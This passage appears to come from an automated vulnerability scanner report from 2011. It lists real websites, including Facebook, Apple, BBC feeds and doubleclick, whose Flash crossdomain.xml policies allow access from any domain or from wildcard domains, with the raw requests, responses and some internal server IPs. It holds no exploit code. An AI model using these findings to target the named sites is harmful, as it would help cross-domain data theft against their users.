<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" />
...[SNIP]...

4.26. http://web2.checkm8.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web2.checkm8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: web2.checkm8.com

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:06 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.22 ny-ad12
ETag: "1311350993"
Last-Modified: Fri, 22-Jul-2011 16:09:53 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 106
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.27. http://www.righthealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.righthealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.righthealth.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:58 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:18 GMT
Accept-Ranges: bytes
Content-Length: 101
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:22:58 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:37:58 GMT;path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.28. http://community.spiceworks.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.spiceworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: community.spiceworks.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:35:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Jul 2011 02:05:00 GMT
ETag: "3d10fb4-cc-4a7e9d800eb00"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.dell.com"/>
</cross-domain-pol
...[SNIP]...

4.29. http://disqus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 16:13:30 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.30. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Thu, 21 Jul 2011 16:05:19 GMT
Date: Thu, 21 Jul 2011 16:03:19 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.31. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 20 Jul 2011 20:22:21 GMT
Expires: Thu, 21 Jul 2011 20:22:21 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 70890

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.32. http://images.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
X-Cached-Time: Wed, 20 Jul 2011 20:45:03 GMT
Server: Apache/2.2.14 (Unix)
Content-Length: 141
Content-Type: application/xml
Cache-Control: max-age=586
Expires: Thu, 21 Jul 2011 20:41:39 GMT
Date: Thu, 21 Jul 2011 20:31:53 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.33. http://mm.chitika.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mm.chitika.net

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:51 GMT
Server: Apache
Last-Modified: Mon, 02 Jun 2008 19:48:27 GMT
ETag: "35d0385-23d-44eb4477878c0"
Accept-Ranges: bytes
Content-Length: 573
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="vip.unitedsites.com.ar" />
   <allow-access-from domain="*.unitedsites.com.ar" />
   <allow-access-from domain="*.shleper.net" />
   <allow-access-from domain="*.shoshkeles.com" />
   <allow-access-from domain="*.unitedvirtualities.com" />
   <allow-access-from domain="*.akamai.net" />
   <allow-access-from domain="*.chitika.com" />
   <allow-access-from domain="*.chitika.net" />
<allow-access-from domain="208.78.43.149" />
<allow-access-from domain="*.2c-studio.com" />
...[SNIP]...

4.34. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=9
Expires: Thu, 21 Jul 2011 16:03:27 GMT
Date: Thu, 21 Jul 2011 16:03:18 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.35. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Wed, 20 Jul 2011 20:22:59 GMT
Expires: Thu, 21 Jul 2011 20:22:59 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 71384

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.36. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Thu, 21 Jul 2011 11:13:02 GMT
Expires: Fri, 22 Jul 2011 11:13:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 17979
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.37. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.184
Date: Thu, 21 Jul 2011 16:21:20 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.38. http://www.apple.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 02 Jun 2005 16:16:28 GMT
ETag: "8d-3f8918f48ef00"
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cached-Time: Mon, 21 Mar 2011 16:49:30 GMT
nnCoection: close
Content-Type: application/xml
Content-Length: 141
Cache-Control: max-age=206
Expires: Thu, 21 Jul 2011 20:28:22 GMT
Date: Thu, 21 Jul 2011 20:24:56 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="wdirect.apple.com" />
<allow-access-from domain="*.apple.com" />
</cross-domain-policy>

4.39. http://www.disqus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.disqus.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:21 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Length: 244
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.40. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.124.60
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.41. http://www.scmagazineus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scmagazineus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.scmagazineus.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 21 Sep 2009 15:39:52 GMT
Accept-Ranges: bytes
ETag: "6cd10c3d13aca1:0"
Server: Microsoft-IIS/7.5
From: VM-Web1
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:11 GMT
Connection: close
Content-Length: 292

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
